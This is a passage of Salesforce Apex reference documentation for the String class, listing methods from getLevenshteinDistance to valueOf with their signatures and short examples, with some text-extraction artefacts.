Return Value
Type: Integer
Usage
The Levenshtein distance is the number of changes needed to change one String into another. Each change is a single character
modification (deletion, insertion or substitution).
Example:
In this example, the Levenshtein distance is 3, but the threshold argument is 2, which is less than the distance, so this method returns
-1.
Example
String s = 'Hello Jane';
Integer i = s.getLevenshteinDistance('Hello Max', 2);
System.assertEquals(-1, i);
hashCode()
Returns a hash code value for this string.
Signature
public Integer hashCode()
Return Value
Type: Integer
Usage
This value is based on the hash code computed by the Java String.hashCode counterpart method.
1747
Reference
String Class
You can use this method to simplify the computation of a hash code for a custom type that contains String member variables. You can
compute your types hash code value based on the hash code of each String variable. For example:
For more details about the use of hash code methods with custom types, see Using Custom Types in Map Keys and Sets.
Example
public class MyCustomClass {
String x,y;
// Provide a custom hash code
public Integer hashCode() {
return
(31*x.hashCode())^(y.hashCode());
}
}
indexOf(String)
Returns the index of the first occurrence of the specified substring. If the substring does not occur, this method returns -1.
Signature
public Integer indexOf(String subString)
Parameters
subString
Type: String
Return Value
Type: Integer
Example
String myString1 = 'abcde';
String myString2 = 'cd';
Integer result = myString1.indexOf(mystring2);
System.assertEquals(2, result);
indexOf(String, Integer)
Returns the zero-based index of the first occurrence of the specified substring from the point of the given index. If the substring does
not occur, this method returns -1.
Signature
public Integer indexOf(String substring, Integer index)
1748
Reference
String Class
Parameters
substring
Type: String
index
Type: Integer
Return Value
Type: Integer
Example
String myString1 = 'abcdabcd';
String myString2 = 'ab';
Integer result = myString1.indexOf(mystring2, 1);
System.assertEquals(4, result);
indexOfAny(String)
Returns the zero-based index of the first occurrence of any character specified in the substring. If none of the characters occur, returns
-1.
Signature
public Integer indexOfAny(String substring)
Parameters
substring
Type: String
Return Value
Type: Integer
Example
String s1 = 'abcd';
String s2 = 'xc';
Integer result = s1.indexOfAny(s2);
System.assertEquals(2, result);
indexOfAnyBut(String)
Returns the zero-based index of the first occurrence of a character that is not in the specified substring. Otherwise, returns -1.
Signature
public Integer indexOfAnyBut(String substring)
1749
Reference
String Class
Parameters
substring
Type: String
Return Value
Type: Integer
Example
String s1 = 'abcd';
String s2 = 'xc';
Integer result = s1.indexOfAnyBut(s2);
System.assertEquals(0, result);
indexOfChar(Integer)
Returns the index of the first occurrence of the character that corresponds to the specified character value.
Signature
public Integer indexOfChar(Integer character)
Parameters
character
Type: Integer
The integer value of the character in the string.
Return Value
Type: Integer
The index of the first occurrence of the specified character, -1 if the character is not found.
Usage
The index that this method returns is in Unicode code units.
Example
String str = '\\u03A9 is (Omega)';
// Returns 0, which is the first character.
System.debug('indexOfChar(937)=' + str.indexOfChar(937));
// Output:
// indexOfChar(937)=0
1750
Reference
String Class
indexOfChar(Integer, Integer)
Returns the index of the first occurrence of the character that corresponds to the specified character value, starting from the specified
index.
Signature
public Integer indexOfChar(Integer character, Integer startIndex)
Parameters
character
Type: Integer
The integer value of the character to look for.
startIndex
Type: Integer
The index to start the search from.
Return Value
Type: Integer
The index, starting from the specified start index, of the first occurrence of the specified character, -1 if the character is not found.
Usage
The index that this method returns is in Unicode code units.
Example
This example shows different ways of searching for the index of the Omega character. The first call to indexOfChar doesnt specify
a start index and therefore the returned index is 0, which is the first occurrence of Omega in the entire string. The subsequent calls specify
a start index to find the occurrence of Omega in substrings that start at the specified index.
String str = ' and \\u03A9 and ';
System.debug('indexOfChar(937)=' + str.indexOfChar(937));
System.debug('indexOfChar(937,1)=' + str.indexOfChar(937,1));
System.debug('indexOfChar(937,10)=' + str.indexOfChar(937,10));
//
//
//
//
Output:
indexOfChar(937)=0
indexOfChar(937,1)=6, (corresponds to the escaped form \\u03A9)
indexOfChar(937,10)=12
indexOfDifference(String)
Returns the zero-based index of the character where the current String begins to differ from the specified String.
Signature
public Integer indexOfDifference(String stringToCompare)
1751
Reference
String Class
Parameters
stringToCompare
Type: String
Return Value
Type: Integer
Example
String s1 = 'abcd';
String s2 = 'abxc';
Integer result = s1.indexOfDifference(s2);
System.assertEquals(2, result);
indexOfIgnoreCase(String)
Returns the zero-based index of the first occurrence of the specified substring without regard to case. If the substring does not occur,
this method returns -1.
Signature
public Integer indexOfIgnoreCase(String substring)
Parameters
substring
Type: String
Return Value
Type: Integer
Example
String s1 = 'abcd';
String s2 = 'BC';
Integer result = s1.indexOfIgnoreCase(s2, 0);
System.assertEquals(1, result);
indexOfIgnoreCase(String, Integer)
Returns the zero-based index of the first occurrence of the specified substring from the point of index i, without regard to case. If the
substring does not occur, this method returns -1.
Signature
public Integer indexOfIgnoreCase(String substring, Integer startPosition)
1752
Reference
String Class
Parameters
substring
Type: String
startPosition
Type: Integer
Return Value
Type: Integer
isAllLowerCase()
Returns true if all characters in the current String are lowercase; otherwise, returns false.
Signature
public Boolean isAllLowerCase()
Return Value
Type: Boolean
Example
String allLower = 'abcde';
System.assert(allLower.isAllLowerCase());
isAllUpperCase()
Returns true if all characters in the current String are uppercase; otherwise, returns false.
Signature
public Boolean isAllUpperCase()
Return Value
Type: Boolean
Example
String allUpper = 'ABCDE';
System.assert(allUpper.isAllUpperCase());
isAlpha()
Returns true if all characters in the current String are Unicode letters only; otherwise, returns false.
1753
Reference
String Class
Signature
public Boolean isAlpha()
Return Value
Type: Boolean
Example
// Letters only
String s1 = 'abc';
// Returns true
Boolean b1 =
s1.isAlpha();
System.assertEquals(
true, b1);
// Letters and numbers
String s2 = 'abc 21';
// Returns false
Boolean b2 =
s2.isAlpha();
System.assertEquals(
false, b2);
isAlphaSpace()
Returns true if all characters in the current String are Unicode letters or spaces only; otherwise, returns false.
Signature
public Boolean isAlphaSpace()
Return Value
Type: Boolean
Example
String alphaSpace = 'aA Bb';
System.assert(alphaSpace.isAlphaSpace());
String notAlphaSpace = 'ab 12';
System.assert(!notAlphaSpace.isAlphaSpace());
notAlphaSpace = 'aA$Bb';
System.assert(!notAlphaSpace.isAlphaSpace());
isAlphanumeric()
Returns true if all characters in the current String are Unicode letters or numbers only; otherwise, returns false.
1754
Reference
String Class
Signature
public Boolean isAlphanumeric()
Return Value
Type: Boolean
Example
// Letters only
String s1 = 'abc';
// Returns true
Boolean b1 =
s1.isAlphanumeric();
System.assertEquals(
true, b1);
// Letters and numbers
String s2 = 'abc021';
// Returns true
Boolean b2 =
s2.isAlphanumeric();
System.assertEquals(
true, b2);
isAlphanumericSpace()
Returns true if all characters in the current String are Unicode letters, numbers, or spaces only; otherwise, returns false.
Signature
public Boolean isAlphanumericSpace()
Return Value
Type: Boolean
Example
String alphanumSpace = 'AE 86';
System.assert(alphanumSpace.isAlphanumericSpace());
String notAlphanumSpace = 'aA$12';
System.assert(!notAlphanumSpace.isAlphaSpace());
isAsciiPrintable()
Returns true if the current String contains only ASCII printable characters; otherwise, returns false.
Signature
public Boolean isAsciiPrintable()
1755
Reference
String Class
Return Value
Type: Boolean
Example
String ascii = 'abcd1234!@#$%^&*()`~-_+={[}]|:<,>.?';
System.assert(ascii.isAsciiPrintable());
String notAscii = '';
System.assert(!notAscii.isAsciiPrintable());
isBlank(String)
Returns true if the specified String is white space, empty (''), or null; otherwise, returns false.
Signature
public static Boolean isBlank(String inputString)
Parameters
inputString
Type: String
Return Value
Type: Boolean
Example
String blank = '';
String nullString = null;
String whitespace = ' ';
System.assert(String.isBlank(blank));
System.assert(String.isBlank(nullString));
System.assert(String.isBlank(whitespace));
String alpha = 'Hello';
System.assert(!String.isBlank(alpha));
isEmpty(String)
Returns true if the specified String is empty ('') or null; otherwise, returns false.
Signature
public static Boolean isEmpty(String inputString)
Parameters
inputString
Type: String
1756
Reference
String Class
Return Value
Type: Boolean
Example
String empty = '';
String nullString = null;
System.assert(String.isEmpty(empty));
System.assert(String.isEmpty(nullString));
String whitespace = ' ';
String alpha = 'Hello';
System.assert(!String.isEmpty(whitespace));
System.assert(!String.isEmpty(alpha));
isNotBlank(String)
Returns true if the specified String is not whitespace, not empty (''), and not null; otherwise, returns false.
Signature
public static Boolean isNotBlank(String inputString)
Parameters
inputString
Type: String
Return Value
Type: Boolean
Example
String alpha = 'Hello world!';
System.assert(String.isNotBlank(alpha));
String blank = '';
String nullString = null;
String whitespace = ' ';
System.assert(!String.isNotBlank(blank));
System.assert(!String.isNotBlank(nullString));
System.assert(!String.isNotBlank(whitespace));
isNotEmpty(String)
Returns true if the specified String is not empty ('') and not null; otherwise, returns false.
Signature
public static Boolean isNotEmpty(String inputString)
1757
Reference
String Class
Parameters
inputString
Type: String
Return Value
Type: Boolean
Example
String whitespace = ' ';
String alpha = 'Hello world!';
System.assert(String.isNotEmpty(whitespace));
System.assert(String.isNotEmpty(alpha));
String empty = '';
String nullString = null;
System.assert(!String.isNotEmpty(empty));
System.assert(!String.isNotEmpty(nullString));
isNumeric()
Returns true if the current String contains only Unicode digits; otherwise, returns false.
Signature
public Boolean isNumeric()
Return Value
Type: Boolean
Usage
A decimal point (1.2) is not a Unicode digit.
Example
String numeric = '1234567890';
System.assert(numeric.isNumeric());
String alphanumeric = 'R32';
String decimalPoint = '1.2';
System.assert(!alphanumeric.isNumeric());
System.assert(!decimalpoint.isNumeric());
isNumericSpace()
Returns true if the current String contains only Unicode digits or spaces; otherwise, returns false.
Signature
public Boolean isNumericSpace()
1758
Reference
String Class
Return Value
Type: Boolean
Usage
A decimal point (1.2) is not a Unicode digit.
Example
String numericSpace = '1 2 3';
System.assert(numericSpace.isNumericspace());
String notNumericspace = 'FD3S FC3S';
System.assert(!notNumericspace.isNumericspace());
isWhitespace()
Returns true if the current String contains only white space characters or is empty; otherwise, returns false.
Signature
public Boolean isWhitespace()
Return Value
Type: Boolean
Example
String whitespace = ' ';
String blank = '';
System.assert(whitespace.isWhitespace());
System.assert(blank.isWhitespace());
String alphanum = 'SIL80';
System.assert(!alphanum.isWhitespace());
join(Object, String)
Joins the elements of the specified iterable object, such as a List, into a single String separated by the specified separator.
Signature
public static String join(Object iterableObj, String separator)
Parameters
iterableObj
Type: Object
separator
Type: String
1759
Reference
String Class
Return Value
Type: String
Usage
List<Integer> li = new
List<Integer>
{10, 20, 30};
String s = String.join(
li, '/');
System.assertEquals(
'10/20/30', s);
lastIndexOf(String)
Returns the index of the last occurrence of the specified substring. If the substring does not occur, this method returns -1.
Signature
public Integer lastIndexOf(String substring)
Parameters
substring
Type: String
Return Value
Type: Integer
Example
String s1 = 'abcdefgc';
Integer i1 = s1.lastIndexOf('c');
System.assertEquals(7, i1);
lastIndexOf(String, Integer)
Returns the index of the last occurrence of the specified substring, starting from the character at index 0 and ending at the specified
index.
Signature
public Integer lastIndexOf(String substring, Integer endPosition)
Parameters
substring
Type: String
1760
Reference
String Class
endPosition
Type: Integer
Return Value
Type: Integer
Usage
If the substring doesnt occur or endPosition is negative, this method returns -1. If endPosition is larger than the last index
in the current String, the entire String is searched.
Example
String s1 = 'abcdaacd';
Integer i1 =
s1.lastIndexOf('c', 7);
System.assertEquals(
6, i1);
Integer i2 =
s1.lastIndexOf('c', 3);
System.assertEquals(
2, i2);
lastIndexOfChar(Integer)
Returns the index of the last occurrence of the character that corresponds to the specified character value.
Signature
public Integer indexOfChar(Integer character)
Parameters
character
Type: Integer
The integer value of the character in the string.
Return Value
Type: Integer
The index of the last occurrence of the specified character, -1 if the character is not found.
Usage
The index that this method returns is in Unicode code units.
1761
Reference
String Class
Example
String str = '\u03A9 is (Omega)';
// Get the last occurrence of Omega.
System.assertEquals(5, str.lastIndexOfChar(937));
lastIndexOfChar(Integer, Integer)
Returns the index of the last occurrence of the character that corresponds to the specified character value, starting from the specified
index.
Signature
public Integer lastIndexOfChar(Integer character, Integer endIndex)
Parameters
character
Type: Integer
The integer value of the character to look for.
endIndex
Type: Integer
The index to end the search at.
Return Value
Type: Integer
The index, starting from the specified start index, of the last occurrence of the specified character. -1 if the character is not found.
Usage
The index that this method returns is in Unicode code units.
Example
This example shows different ways of searching for the index of the last occurrence of the Omega character. The first call to
lastIndexOfChar doesnt specify an end index and therefore the returned index is 12, which is the last occurrence of Omega in
the entire string. The subsequent calls specify an end index to find the last occurrence of Omega in substrings.
String str = ' and \u03A9 and ';
System.assertEquals(12, str.lastIndexOfChar(937));
System.assertEquals(6, str.lastIndexOfChar(937,11));
System.assertEquals(0, str.lastIndexOfChar(937,5));
lastIndexOfIgnoreCase(String)
Returns the index of the last occurrence of the specified substring regardless of case.
1762
Reference
String Class
Signature
public Integer lastIndexOfIgnoreCase(String substring)
Parameters
substring
Type: String
Return Value
Type: Integer
Usage
If the substring doesnt occur, this method returns -1.
Example
String s1 = 'abcdaacd';
Integer i1 =
s1.lastIndexOfIgnoreCase('DAAC');
System.assertEquals(
3, i1);
lastIndexOfIgnoreCase(String, Integer)
Returns the index of the last occurrence of the specified substring regardless of case, starting from the character at index 0 and ending
at the specified index.
Signature
public Integer lastIndexOfIgnoreCase(String substring, Integer endPosition)
Parameters
substring
Type: String
endPosition
Type: Integer
Return Value
Type: Integer
Usage
If the substring doesnt occur or endPosition is negative, this method returns -1. If endPosition is larger than the last index
in the current String, the entire String is searched.
1763
Reference
String Class
Example
String s1 = 'abcdaacd';
Integer i1 =
s1.lastIndexOfIgnoreCase('C', 7);
System.assertEquals(
6, i1);
left(Integer)
Returns the leftmost characters of the current String of the specified length.
Signature
public String left(Integer length)
Parameters
length
Type: Integer
Return Value
Type: String
Usage
If length is greater than the String size, the entire String is returned.
Example
String s1 = 'abcdaacd';
String s2 =
s1.left(3);
System.assertEquals(
'abc', s2);
leftPad(Integer)
Returns the current String padded with spaces on the left and of the specified length.
Signature
public String leftPad(Integer length)
Parameters
length
Type: Integer
1764
Reference
String Class
Usage
If length is less than or equal to the current String size, the entire String is returned without space padding.
Return Value
Type: String
Example
String s1 = 'abc';
String s2 =
s1.leftPad(5);
System.assertEquals(
' abc', s2);
length()
Returns the number of 16-bit Unicode characters contained in the String.
Signature
public Integer length()
Return Value
Type: Integer
Example
String myString = 'abcd';
Integer result = myString.length();
System.assertEquals(result, 4);
mid(Integer, Integer)
Returns a new String that begins with the character at the specified zero-based startIndex with the number of characters specified
by length.
Signature
public String mid(Integer startIndex, Integer length)
Parameters
startIndex
Type: Integer
If startIndex is negative, it is considered to be zero.
length
Type: Integer
1765
Reference
String Class
If length is negative or zero, an empty String is returned. If length is greater than the remaining characters, the remainder of
the String is returned.
Return Value
Type: String
Usage
This method is similar to the substring(startIndex) and substring(startIndex, endIndex) methods, except
that the second argument is the number of characters to return.
Example
String s = 'abcde';
String s2 = s.mid(2, 3);
System.assertEquals(
'cde', s2);
normalizeSpace()
Returns the current String with leading, trailing, and repeating white space characters removed.
Signature
public String normalizeSpace()
Return Value
Type: String
Usage
This method normalizes the following white space characters: space, tab (\t), new line (\n), carriage return (\r), and form feed (\f).
Example
String s1 =
'Salesforce \t
force.com';
String s2 =
s1.normalizeSpace();
System.assertEquals(
'Salesforce force.com', s2);
offsetByCodePoints(Integer, Integer)
Returns the index of the Unicode code point that is offset by the specified number of code points, starting from the given index.
Signature
public Integer offsetByCodePoints(Integer index, Integer codePointOffset)
1766
Reference
String Class
Parameters
index
Type: Integer
The start index in the string.
codePointOffset
Type: Integer
The number of code points to be offset.
Return Value
Type: Integer
The index that corresponds to the start index that is added to the offset.
Usage
Unpaired surrogates within the text range that is specified by index and codePointOffset count as one code point each.
Example
This example calls offsetByCodePoints on a string with a start index of 0 (to start from the first character) and an offset of threee
code points. The string contains one sequence of supplementary characters in escaped form (a pair of characters). After an offset of three
code points when counting from the beginning of the string, the returned code point index is four.
String str = 'A \uD835\uDD0A BC';
System.assertEquals(4, str.offsetByCodePoints(0,3));
remove(String)
Removes all occurrences of the specified substring and returns the String result.
Signature
public String remove(String substring)
Parameters
substring
Type: String
Return Value
Type: String
Example
String s1 = 'Salesforce and force.com';
String s2 =
s1.remove('force');
1767
Reference
String Class
System.assertEquals(
'Sales and .com', s2);
removeEnd(String)
Removes the specified substring only if it occurs at the end of the String.
Signature
public String removeEnd(String substring)
Parameters
substring
Type: String
Return Value
Type: String
Example
String s1 = 'Salesforce and force.com';
String s2 =
s1.removeEnd('.com');
System.assertEquals(
'Salesforce and force', s2);
removeEndIgnoreCase(String)
Removes the specified substring only if it occurs at the end of the String using a case-insensitive match.
Signature
public String removeEndIgnoreCase(String substring)
Parameters
substring
Type: String
Return Value
Type: String
Example
String s1 = 'Salesforce and force.com';
String s2 =
s1.removeEndIgnoreCase('.COM');
1768
Reference
String Class
System.assertEquals(
'Salesforce and force', s2);
removeStart(String)
Removes the specified substring only if it occurs at the beginning of the String.
Signature
public String removeStart(String substring)
Parameters
substring
Type: String
Return Value
Type: String
Example
String s1 = 'Salesforce and force.com';
String s2 =
s1.removeStart('Sales');
System.assertEquals(
'force and force.com', s2);
removeStartIgnoreCase(String)
Removes the specified substring only if it occurs at the beginning of the String using a case-insensitive match.
Signature
public String removeStartIgnoreCase(String substring)
Parameters
substring
Type: String
Return Value
Type: String
Example
String s1 = 'Salesforce and force.com';
String s2 =
s1.removeStartIgnoreCase('SALES');
1769
Reference
String Class
System.assertEquals(
'force and force.com', s2);
repeat(Integer)
Returns the current String repeated the specified number of times.
Signature
public String repeat(Integer numTimes)
Parameters
numTimes
Type: Integer
Return Value
Type: String
Example
String s1 = 'SFDC';
String s2 =
s1.repeat(2);
System.assertEquals(
'SFDCSFDC', s2);
repeat(String, Integer)
Returns the current String repeated the specified number of times using the specified separator to separate the repeated Strings.
Signature
public String repeat(String separator, Integer numTimes)
Parameters
separator
Type: String
numTimes
Type: Integer
Return Value
Type: String
1770
Reference
String Class
Example
String s1 = 'SFDC';
String s2 =
s1.repeat('-', 2);
System.assertEquals(
'SFDC-SFDC', s2);
replace(String, String)
Replaces each substring of a string that matches the literal target sequence target with the specified literal replacement sequence
replacement.
Signature
public String replace(String target, String replacement)
Parameters
target
Type: String
replacement
Type: String
Return Value
Type: String
Example
String s1 = 'abcdbca';
String target = 'bc';
String replacement = 'xy';
String s2 = s1.replace(target, replacement);
System.assertEquals('axydxya', s2);
replaceAll(String, String)
Replaces each substring of a string that matches the regular expression regExp with the replacement sequence replacement.
Signature
public String replaceAll(String regExp, String replacement)
Parameters
regExp
Type: String
replacement
Type: String
1771
Reference
String Class
Return Value
Type: String
Usage
See the Java Pattern class for information on regular expressions.
Example
String s1 = 'a b c 5 xyz';
String regExp = '[a-zA-z]';
String replacement = '1';
String s2 = s1.replaceAll(regExp, replacement);
System.assertEquals('1 1 1 5 111', s2);
replaceFirst(String, String)
Replaces the first substring of a string that matches the regular expression regExp with the replacement sequence replacement.
Signature
public String replaceFirst(String regExp, String replacement)
Parameters
regExp
Type: String
replacement
Type: String
Return Value
Type: String
Usage
See the Java Pattern class for information on regular expressions.
Example
String s1 = 'a b c 11 xyz';
String regExp = '[a-zA-z]{2}';
String replacement = '2';
String s2 = s1.replaceFirst(regExp, replacement);
System.assertEquals('a b c 11 2z', s2);
reverse()
Returns a String with all the characters reversed.
1772
Reference
String Class
Signature
public String reverse()
Return Value
Type: String
right(Integer)
Returns the rightmost characters of the current String of the specified length.
Signature
public String right(Integer length)
Parameters
length
Type: Integer
If length is greater than the String size, the entire String is returned.
Return Value
Type: String
Example
String s1 = 'Hello Max';
String s2 =
s1.right(3);
System.assertEquals(
'Max', s2);
rightPad(Integer)
Returns the current String padded with spaces on the right and of the specified length.
Signature
public String rightPad(Integer length)
Parameters
length
Type: Integer
If length is less than or equal to the current String size, the entire String is returned without space padding.
Return Value
Type: String
1773
Reference
String Class
Example
String s1 = 'abc';
String s2 =
s1.rightPad(5);
System.assertEquals(
'abc ', s2);
split(String, Integer)
Returns a list that contains each substring of the String that is terminated by the regular expression regExp, or the end of the String.
Signature
public String[] split(String regExp, Integer limit)
Parameters
regExp
Type: String
limit
Type: Integer
Return Value
Type: String[]
Usage
See the Java Pattern class for information on regular expressions.
The substrings are placed in the list in the order in which they occur in the String.If regExp does not match any part of the String, the
resulting list has just one element containing the original String.
The optional limit parameter controls the number of times the pattern is applied and therefore affects the length of the list:
If limit is greater than zero, the pattern is applied at most limit - 1 times, the list's length is no greater than limit, and the
list's last entry contains all input beyond the last matched delimiter.
If limit is non-positive then the pattern is applied as many times as possible and the list can have any length.
If limit is zero then the pattern is applied as many times as possible, the list can have any length, and trailing empty strings are
discarded.
For example, for String s = 'boo:and:foo':
s.split(':', 2) results in {'boo', 'and:foo'}
s.split(':', 5) results in {'boo', 'and', 'foo'}
s.split(':', -2) results in {'boo', 'and', 'foo'}
s.split('o', 5) results in {'b', '', ':and:f', '', ''}
s.split('o', -2) results in {'b', '', ':and:f', '', ''}
s.split('o', 0) results in {'b', '', ':and:f'}
1774
Reference
String Class
Example
In the following example, a string is split, using a backslash as a delimiter.
public String splitPath(String filename) {
if (filename == null)
return null;
List<String> parts = filename.split('\\\\');
filename = parts[parts.size()-1];
return filename;
}
// For example, if the file path is e:\\processed\\PPDSF100111.csv
// This method splits the path and returns the last part.
// Returned filename is PPDSF100111.csv
splitByCharacterType()
Splits the current String by character type and returns a list of contiguous character groups of the same type as complete tokens.
Signature
public List<String> splitByCharacterType()
Return Value
Type: List<String>
Usage
For more information about the character types used, see java.lang.Character.getType(char).
Example
String s1 = 'Force.com platform';
List<String> ls =
s1.splitByCharacterType();
System.debug(ls);
// Writes this output:
// (F, orce, ., com, , platform)
splitByCharacterTypeCamelCase()
Splits the current String by character type and returns a list of contiguous character groups of the same type as complete tokens, with
the following exception: the uppercase character, if any, immediately preceding a lowercase character token belongs to the following
character token rather than to the preceding.
Signature
public List<String> splitByCharacterTypeCamelCase()
1775
Reference
String Class
Return Value
Type: List<String>
Usage
For more information about the character types used, see java.lang.Character.getType(char).
Example
String s1 = 'Force.com platform';
List<String> ls =
s1.splitByCharacterTypeCamelCase();
System.debug(ls);
// Writes this output:
// (Force, ., com, , platform)
startsWith(String)
Returns true if the String that called the method begins with the specified prefix.
Signature
public Boolean startsWith(String prefix)
Parameters
prefix
Type: String
Return Value
Type: Boolean
Example
String s1 = 'AE86 vs EK9';
System.assert(s1.startsWith('AE86'));
startsWithIgnoreCase(String)
Returns true if the current String begins with the specified prefix regardless of the prefix case.
Signature
public Boolean startsWithIgnoreCase(String prefix)
Parameters
prefix
Type: String
1776
Reference
String Class
Return Value
Type: Boolean
Example
String s1 = 'AE86 vs EK9';
System.assert(s1.startsWithIgnoreCase('ae86'));
stripHtmlTags(String)
Removes HTML markup from the input string and returns the plain text.
Signature
public String stripHtmlTags(String htmlInput)
Parameters
htmlInput
Type: String
Return Value
Type: String
Example
String s1 = '<b>hello world</b>';
String s2 = s1.stripHtmlTags();
System.assertEquals(
'hello world', s2);
substring(Integer)
Returns a new String that begins with the character at the specified zero-based startIndex and extends to the end of the String.
Signature
public String substring(Integer startIndex)
Parameters
startIndex
Type: Integer
Return Value
Type: String
1777
Reference
String Class
Example
String s1 = 'hamburger';
System.assertEquals('burger', s1.substring(3));
substring(Integer, Integer)
Returns a new String that begins with the character at the specified zero-based startIndex and extends to the character at
endIndex - 1.
Signature
public String substring(Integer startIndex, Integer endIndex)
Parameters
startIndex
Type: Integer
endIndex
Type: Integer
Return Value
Type: String
Example
'hamburger'.substring(4, 8);
// Returns "urge"
'smiles'.substring(1, 5);
// Returns "mile"
substringAfter(String)
Returns the substring that occurs after the first occurrence of the specified separator.
Signature
public String substringAfter(String separator)
Parameters
separator
Type: String
Return Value
Type: String
1778
Reference
String Class
Example
String s1 = 'Force.com.platform';
String s2 =
s1.substringAfter('.');
System.assertEquals(
'com.platform', s2);
substringAfterLast(String)
Returns the substring that occurs after the last occurrence of the specified separator.
Signature
public String substringAfterLast(String separator)
Parameters
separator
Type: String
Return Value
Type: String
Example
String s1 = 'Force.com.platform';
String s2 =
s1.substringAfterLast('.');
System.assertEquals(
'platform', s2);
substringBefore(String)
Returns the substring that occurs before the first occurrence of the specified separator.
Signature
public String substringBefore(String separator)
Parameters
separator
Type: String
Return Value
Type: String
1779
Reference
String Class
Example
String s1 = 'Force.com.platform';
String s2 =
s1.substringBefore('.');
System.assertEquals(
'Force', s2);
substringBeforeLast(String)
Returns the substring that occurs before the last occurrence of the specified separator.
Signature
public String substringBeforeLast(String separator)
Parameters
separator
Type: String
Return Value
Type: String
Example
String s1 = 'Force.com.platform';
String s2 =
s1.substringBeforeLast('.');
System.assertEquals(
'Force.com', s2);
substringBetween(String)
Returns the substring that occurs between two instances of the specified String.
Signature
public String substringBetween(String tag)
Parameters
tag
Type: String
Return Value
Type: String
1780
Reference
String Class
Example
String s1 = 'tagYellowtag';
String s2 =
s1.substringBetween('tag');
System.assertEquals(
'Yellow', s2);
substringBetween(String, String)
Returns the substring that occurs between the two specified Strings.
Signature
public String substringBetween(String open, String close)
Parameters
open
Type: String
close
Type: String
Return Value
Type: String
Example
String s1 = 'xYellowy';
String s2 =
s1.substringBetween('x','y');
System.assertEquals(
'Yellow', s2);
swapCase(String, String)
Swaps the case of all characters and returns the resulting String.
Signature
public String swapCase(String open, String close)
Parameters
open
Type: String
close
Type: String
1781
Reference
String Class
Return Value
Type: String
Usage
Upper case and title case converts to lower case, and lower case converts to upper case.
Example
String s1 = 'Force.com';
String s2 =
s1.swapCase();
System.assertEquals(
'fORCE.COM', s2);
toLowerCase()
Converts all of the characters in the String to lowercase using the rules of the default locale.
Signature
public String toLowerCase()
Return Value
Type: String
Example
String s1 = 'ThIs iS hArD tO rEaD';
System.assertEquals('this is hard to read',
s1.toLowerCase());
toLowerCase(String)
Converts all of the characters in the String to lowercase using the rules of the specified locale.
Signature
public String toLowerCase(String locale)
Parameters
locale
Type: String
Return Value
Type: String
1782
Reference
String Class
Example
// Example in Turkish
// An uppercase dotted "i", \u0304, which is
// Note this contains both a as well as a I
String s1 = 'KIYMETL';
String s1Lower = s1.toLowerCase('tr');
// Dotless lowercase "i", \u0131, which is
// Note this has both a i and
String expected = 'kymetli';
System.assertEquals(expected, s1Lower);
// Note if this was done in toLowerCase(en), it would output kiymetli
toUpperCase()
Converts all of the characters in the String to uppercase using the rules of the default locale.
Signature
public String toUpperCase()
Return Value
Type: String
Example
String myString1 = 'abcd';
String myString2 = 'ABCD';
myString1 =
myString1.toUpperCase();
Boolean result =
myString1.equals(myString2);
System.assertEquals(result, true);
toUpperCase(String)
Converts all of the characters in the String to the uppercase using the rules of the specified locale.
Signature
public String toUpperCase(String locale)
Parameters
locale
Type: String
Return Value
Type: String
1783
Reference
String Class
Example
// Example in Turkish
// Dotless lowercase "i", \u0131, which is
// Note this has both a i and
String s1 = 'imkansz';
String s1Upper = s1.toUpperCase('tr');
// An uppercase dotted "i", \u0304, which is
// Note this contains both a as well as a I
String expected = 'MKANSIZ';
System.assertEquals(expected, s1Upper);
trim()
Returns a copy of the string that no longer contains any leading or trailing white space characters.
Signature
public String trim()
Return Value
Type: String
Usage
Leading and trailing ASCII control characters such as tabs and newline characters are also removed. White space and control characters
that arent at the beginning or end of the sentence arent removed.
Example
String s1 = '
Hello!
';
String trimmed = s1.trim();
system.assertEquals('Hello!', trimmed);
uncapitalize()
Returns the current String with the first letter in lowercase.
Signature
public String uncapitalize()
Return Value
Type: String
Example
String s1 =
'Hello max';
1784
Reference
String Class
String s2 =
s1.uncapitalize();
System.assertEquals(
'hello max',
s2);
unescapeCsv()
Returns a String representing an unescaped CSV column.
Signature
public String unescapeCsv()
Return Value
Type: String
Usage
If the String is enclosed in double quotes and contains a comma, newline or double quote, quotes are removed. Also, any double quote
escaped characters (a pair of double quotes) are unescaped to just one double quote.
If the String is not enclosed in double quotes, or is and does not contain a comma, newline or double quote, it is returned unchanged.
Example
String s1 =
'"Max1, ""Max2"""';
String s2 =
s1.unescapeCsv();
System.assertEquals(
'Max1, "Max2"',
s2);
unescapeEcmaScript()
Unescapes any EcmaScript literals found in the String.
Signature
public String unescapeEcmaScript()
Return Value
Type: String
Example
String s1 =
'\"3.8\",\"3.9\"';
1785
Reference
String Class
String s2 =
s1.unescapeEcmaScript();
System.assertEquals(
'"3.8","3.9"',
s2);
unescapeHtml3()
Unescapes the characters in a String using HTML 3.0 entities.
Signature
public String unescapeHtml3()
Return Value
Type: String
Example
String s1 =
'"<Black&White>"';
String s2 =
s1.unescapeHtml3();
System.assertEquals(
'"<Black&White>"',
s2);
unescapeHtml4()
Unescapes the characters in a String using HTML 4.0 entities.
Signature
public String unescapeHtml4()
Return Value
Type: String
Usage
If an entity isnt recognized, it is kept as is in the returned string.
Example
String s1 =
'"<Black&White>"';
String s2 =
s1.unescapeHtml4();
System.assertEquals(
1786
Reference
String Class
'"<Black&White>"',
s2);
unescapeJava()
Returns a String whose Java literals are unescaped. Literals unescaped include escape sequences for quotes (\\") and control characters,
such as tab (\\t), and carriage return (\\n).
Signature
public String unescapeJava()
Return Value
Type: String
The unescaped string.
Example
String s = 'Company: \\"Salesforce.com\\"';
String unescapedStr = s.unescapeJava();
System.assertEquals('Company: "Salesforce.com"', unescapedStr);
unescapeUnicode()
Returns a String whose escaped Unicode characters are unescaped.
Signature
public String unescapeUnicode()
Return Value
Type: String
The unescaped string.
Example
String s = 'De onde voc\u00EA \u00E9?';
String unescapedStr = s.unescapeUnicode();
System.assertEquals('De onde voc ?', unescapedStr);
unescapeXml()
Unescapes the characters in a String using XML entities.
Signature
public String unescapeXml()
1787
Reference
String Class
Return Value
Type: String
Usage
Supports only the five basic XML entities (gt, lt, quot, amp, apos). Does not support DTDs or external entities.
Example
String s1 =
'"<Black&White>"';
String s2 =
s1.unescapeXml();
System.assertEquals(
'"<Black&White>"',
s2);
valueOf(Date)
Returns a String that represents the specified Date in the standard yyyy-MM-dd format.
Signature
public static String valueOf(Date dateToConvert)
Parameters
dateToConvert
Type: Date
Return Value
Type: String
Example
Date myDate = Date.Today();
String sDate = String.valueOf(myDate);
valueOf(Datetime)
Returns a String that represents the specified Datetime in the standard yyyy-MM-dd HH:mm:ss format for the local time zone.
Signature
